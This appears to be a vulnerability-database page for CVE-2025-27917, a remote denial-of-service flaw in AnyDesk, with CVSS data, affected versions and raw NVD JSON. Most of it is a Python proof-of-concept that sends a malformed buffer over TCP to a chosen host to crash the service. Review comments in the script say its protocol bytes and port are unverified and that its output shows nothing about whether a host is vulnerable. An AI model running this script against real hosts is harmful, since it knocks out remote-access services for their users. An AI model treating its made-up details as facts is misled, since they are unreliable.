Security Vulnerability Report
CVE-2025-27917 CVSS 7.5 HIGH

CVE-2025-27917

Published: 2025-11-06 18:15:41
Last Modified: 2025-12-08 17:16:13

Description

An issue was discovered in AnyDesk for Windows before 9.0.5, AnyDesk for macOS before 9.0.1, AnyDesk for Linux before 7.0.0, AnyDesk for iOS before 7.1.2, and AnyDesk for Android before 8.0.0. Remote Denial of Service can occur because of incorrect deserialization that results in failed memory allocation and a NULL pointer dereference.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

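cpe:2.3:a:anydesk:anydesk:*:*:*:*:*:windows:*:* (up to and including 9.0.4) - VULNERABLE
Note: the NVD configuration in the raw JSON below contains only this Windows CPE. The macOS, Linux, iOS and Android ranges listed next come from the description text, so tooling that matches on CPE alone may not flag those platforms.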
AnyDesk for Windows < 9.0.5
AnyDesk for macOS < 9.0.1
AnyDesk for Linux < 7.0.0
AnyDesk for iOS < 7.1.2
AnyDesk for Android < 8.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-27917 PoC - AnyDesk Remote Denial of Service
Description: Exploits incorrect deserialization leading to NULL pointer dereference
Author: Security Research
Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-27917

Review notes:
    * The advisory text on this page describes the flaw only as "incorrect
      deserialization that results in failed memory allocation and a NULL
      pointer dereference" (CWE-476). It does not document any wire format.
      The magic bytes, message type, length field and port used below are
      asserted by this listing alone and are unverified -- TODO confirm
      against the references in the raw JSON before relying on them, e.g.
      as the basis for a network detection signature.
    * Impact per the CVSS vector is availability only (C:N/I:N/A:H).
      Remediation is upgrading to the fixed versions named in the
      description (Windows 9.0.5, macOS 9.0.1, Linux 7.0.0, iOS 7.1.2,
      Android 8.0.0).
    * The result of this script is not a patch-verification signal; see the
      note on exploit_anydesk(). Confirm exposure from the installed version.
"""
import socket
import struct
import sys


def create_malicious_payload() -> bytes:
    """
    Build the fixed byte string that this script sends.

    The result is a constant 109-byte buffer: a 4-byte tag, two little-endian
    uint16 fields, one little-endian uint32 field, one byte, and 96 bytes of
    padding. Nothing in it depends on the target or on any negotiated state.

    NOTE(review): the original author describes this as "malformed serialized
    data" aimed at the allocation failure / NULL dereference. The field names
    and meanings below are the author's labels; the page gives no source for
    them.

    Returns:
        bytes: the concatenated buffer.
    """
    # 4-byte tag. The author labels it "AnyDesk Service Protocol signature";
    # unverified -- TODO confirm.
    header = b'ADSP'

    # Two little-endian uint16 fields, labelled by the author as protocol
    # version (1) and a "control message type" (0x0010). Unverified labels.
    version = struct.pack('<H', 1)
    msg_type = struct.pack('<H', 0x0010)

    # Little-endian uint32 set to the maximum value. The author claims this
    # drives an integer overflow in a size calculation; the advisory on this
    # page mentions only a failed allocation, not an overflow -- treat the
    # mechanism as the author's assumption.
    invalid_length = struct.pack('<I', 0xFFFFFFFF)

    # Single byte 0xFF, labelled by the author as an invalid object type.
    object_type = struct.pack('<B', 0xFF)

    # 64 zero bytes followed by 32 0xFF bytes. The author says the pattern is
    # meant to provoke a parsing error; no basis for that is shown here.
    padding = b'\x00' * 64 + b'\xFF' * 32

    # Concatenate in declaration order.
    payload = header + version + msg_type + invalid_length + object_type + padding
    return payload


def exploit_anydesk(target_host: str, target_port: int = 6566) -> bool:
    """
    Open one TCP connection, write the fixed buffer once, and close.

    Args:
        target_host: host passed to socket.connect().
        target_port: TCP port passed to socket.connect(). The default of 6566
            is this listing's choice; the page gives no source for it --
            TODO confirm.

    Returns:
        bool: True when connect() and send() completed without raising,
        False when any exception was caught.

    NOTE(review): True says nothing about the peer. The script never reads
    from the socket and never checks whether the service stayed up, so the
    "[+]" / "[!]" messages are printed for any listener that accepts the
    connection. Likewise False only means the TCP exchange failed. Neither
    outcome is evidence that a host is vulnerable or patched.

    NOTE(review): the return value of send() is ignored, and sock.close() is
    reached only on the success path; on any exception the socket object is
    left for garbage collection.
    """
    try:
        print(f'[*] Target: {target_host}:{target_port}')
        print('[*] Creating malicious payload for CVE-2025-27917...')
        payload = create_malicious_payload()
        print(f'[*] Payload size: {len(payload)} bytes')

        print('[*] Establishing connection...')
        # Plain IPv4 TCP socket; the 10-second timeout applies to connect()
        # and to send().
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_host, target_port))

        print('[*] Sending malicious payload...')
        sock.send(payload)
        print('[+] Payload sent successfully')
        # This message is a prediction, not an observation: nothing below
        # checks the state of the remote service.
        print('[!] Target should crash due to NULL pointer dereference')

        sock.close()
        return True
    except socket.timeout:
        print('[-] Connection timed out')
        return False
    except socket.error as e:
        print(f'[-] Socket error: {e}')
        return False
    except Exception as e:
        # Catch-all so the script always returns a bool instead of raising.
        print(f'[-] Unexpected error: {e}')
        return False


if __name__ == '__main__':
    # CLI: one required positional argument (host) and an optional port.
    if len(sys.argv) < 2:
        print(f'Usage: {sys.argv[0]} <target_ip> [port]')
        print(f'Example: {sys.argv[0]} 192.168.1.100 6566')
        sys.exit(1)
    target = sys.argv[1]
    # int() raises ValueError on a non-numeric port; that is not handled here.
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 6566
    # The boolean result is discarded, so the process exit status does not
    # reflect success or failure of the connection.
    exploit_anydesk(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-27917", "sourceIdentifier": "[email protected]", "published": "2025-11-06T18:15:40.637", "lastModified": "2025-12-08T17:16:13.437", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in AnyDesk for Windows before 9.0.5, AnyDesk for macOS before 9.0.1, AnyDesk for Linux before 7.0.0, AnyDesk for iOS before 7.1.2, and AnyDesk for Android before 8.0.0. Remote Denial of Service can occur because of incorrect deserialization that results in failed memory allocation and a NULL pointer dereference."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:anydesk:anydesk:*:*:*:*:*:windows:*:*", "versionEndIncluding": "9.0.4", 
"matchCriteriaId": "2BB8EC40-287D-4733-B2DF-B86909680119"}]}]}], "references": [{"url": "https://anydesk.com/en/changelog/windows", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://dspace.cvut.cz/bitstream/handle/10467/122721/F8-DP-2025-Krejsa-Vojtech-DP_Krejsa_Vojtech_2025.pdf", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}